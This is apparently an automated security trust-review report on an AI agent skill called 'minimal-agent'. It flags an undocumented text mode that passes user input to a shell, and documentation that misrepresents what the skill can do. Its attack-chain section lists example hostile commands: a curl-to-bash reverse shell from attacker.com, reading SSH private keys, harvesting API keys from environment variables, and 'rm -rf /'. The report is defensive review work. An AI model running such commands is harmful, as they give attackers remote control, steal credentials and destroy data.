Skill Trust Decision

minimal-agent

Name: minimal-agent Trust Review Report
Item: minimal-agent
Rating: 25
Author: ClawSafe

Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.

Install decision first Source: Manual upload Scanned: Apr 4, 2026

Files 3

Artifacts 3

Violations 4

Findings 6

Most direct threat evidence

Critical RCE

Unrestricted Arbitrary Command Execution via V1 Mode

The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.

scripts/agent.py:459

Why this conclusion was reached

2/4 dimensions flagged

Block

Declared vs actual capability

4 undeclared or violating capabilities were inferred.

Review

Hidden execution and egress

3 lower-risk artifacts were extracted and still need context.

Block

Attack chain and severe findings

The report includes 7 attack-chain steps and 4 severe findings.

Pass

Dependencies and supply chain hygiene

Dependencies are present but no obvious high-risk issue stands out.

Attack Chain

Skill marketed as minimal OS control agent with window management and hardware control

deception · SKILL.md:1

V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution

deception · SKILL.md:65

Attacker forces V1 mode via --text flag or config mode='force_text'

access · scripts/agent.py:444

execute_raw_command() passes arbitrary input to shell=True subprocess

Execution · scripts/agent.py:459

Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell

Impact · scripts/agent.py:459

Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys

Impact · scripts/agent.py:459

Attacker executes: 'env | grep API' to harvest credentials

Impact · scripts/agent.py:459

What drove the risk score up

Undeclared arbitrary command execution +35

V1/text mode enables ANY shell command not declared in allowed-tools

Doc-to-code capability mismatch +20

Documentation claims minimal OS control but actual code allows full system access

shell=True subprocess execution +15

execute_raw_command() passes user input directly to shell=True

No parameter validation +5

Command parameters passed directly without sanitization

Most important evidence

Critical RCE

Unrestricted Arbitrary Command Execution via V1 Mode

scripts/agent.py:459

Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.

Critical Doc Mismatch

Documentation Mismatch: Claims Minimal Control But Enables Full System Access

SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.

SKILL.md:67

Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.

High RCE

Direct Shell Injection via User Input

The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.

scripts/agent.py:459

Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.

High Priv Escalation

Undeclared Elevated Permissions

The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.

SKILL.md:87

Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.

Medium Obfuscation

Python venv Path Hardcoded with User Home Directory

Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe' which could be leveraged for persistence or DLL hijacking attacks.

scripts/agent.py:114

Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.

Medium Credential Theft

Potential Environment Variable Access for API Keys

V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.

scripts/agent.py:459

If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.

Declared capability vs actual capability

Shell Pass

Declared WRITE

→

Inferred WRITE

agent.py:run_script() uses subprocess

Filesystem Pass

Declared WRITE

→

Inferred WRITE

agent.py + V1 mode enables any file operation

Network Block

Declared READ

→

Inferred READ_WRITE

—

Database Block

Declared NONE

→

Inferred WRITE

—

Environment Block

Declared NONE

→

Inferred READ

—

Skill Invoke Block

Declared NONE

→

Inferred WRITE

—

Suspicious artifacts and egress

Medium External URL

https://skillhub.tencent.com/skills/system-controller

SKILL.md:262

Medium External URL

https://clawhub.ai/wangjiaocheng/system-controller

SKILL.md:271

Medium External URL

https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip

SKILL.md:275

Dependencies and supply chain

Package	Version	Source	Known vuln	Notes
subprocess	`stdlib`	Python	No	Standard library only
tomllib	`stdlib`	Python	No	Standard library only

File composition

3 files · 1255 lines

Python 1 files · 938 linesMarkdown 1 files · 293 linesTOML 1 files · 24 lines

Files of concern · 2

scripts/agent.py Python · 938 lines

Unrestricted Arbitrary Command Execution via V1 Mode · Direct Shell Injection via User Input · Python venv Path Hardcoded with User Home Directory · Potential Environment Variable Access for API Keys

SKILL.md Markdown · 293 lines

Documentation Mismatch: Claims Minimal Control But Enables Full System Access · Undeclared Elevated Permissions · https://skillhub.tencent.com/skills/system-controller · https://clawhub.ai/wangjiaocheng/system-controller · https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip

Other files · config.toml

Security positives

V2/function-calling mode provides controlled execution with 55 predefined tools

Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode

Configuration allows disabling auto mode fallback to V1

Timeout limits (30s) prevent indefinite command execution